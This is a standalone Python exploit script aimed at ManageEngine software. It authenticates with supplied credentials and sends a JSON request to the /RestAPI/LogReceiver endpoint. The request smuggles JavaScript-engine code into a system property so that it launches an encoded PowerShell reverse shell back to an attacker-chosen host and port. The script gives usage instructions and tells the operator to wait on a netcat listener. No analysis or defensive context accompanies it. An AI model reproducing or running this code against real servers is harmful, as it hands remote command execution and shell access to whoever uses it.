#!/usr/bin/env python3
import requests
import urllib3
import base64
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def exploit(target_url, username, password, lhost, lport):
    session = requests.Session()
    
    # 1. Authenticate to ManageEngine
    login_url = f"{target_url}/j_security_check"
    data = {
        'j_username': username,
        'j_password': password,
        'submit': 'Login'
    }
    
    try:
        login_response = session.post(
            login_url,
            data=data,
            verify=False,
            timeout=10
        )
        
        if 'loginError' in login_response.text:
            print("[-] Authentication failed")
            return False
            
    except Exception as e:
        print(f"[-] Connection error: {str(e)}")
        return False

    # 2. Prepare reverse shell payload
    powershell_cmd = f"$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"
    encoded_cmd = base64.b64encode(powershell_cmd.encode('utf-16le')).decode()
    
    # 3. Exploit the deserialization vulnerability
    exploit_url = f"{target_url}/RestAPI/LogReceiver"
    headers = {
        'Content-Type': 'application/json'
    }
    
    payload = {
        "logType":"name",
        "logData":"raw",
        "hostName":"localhost",
        "appName":"app",
        "logSource":"local",
        "metaData": {
            "systemProperty": {
                "com.adventnet.servicemanager.install.dir": f"\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','powershell -enc {encoded_cmd}']).start()\")"
            }
        }
    }

    try:
        print("[+] Sending exploit payload...")
        response = session.post(
            exploit_url,
            json=payload,
            headers=headers,
            verify=False,
            timeout=15
        )
        
        if response.status_code == 200:
            print("[+] Exploit triggered successfully!")
            print("[+] Check your netcat listener for shell")
        else:
            print(f"[-] Exploit failed (Status code: {response.status_code})")
            
    except Exception as e:
        print(f"[-] Exploit failed: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) != 6:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <lhost> <lport>")
        print(f"Example: {sys.argv[0]} https://localhost:8443 admin admin 192.168.45.217 9001")
        sys.exit(1)
        
    target_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    lhost = sys.argv[4]
    lport = sys.argv[5]
    
    exploit(target_url, username, password, lhost, lport)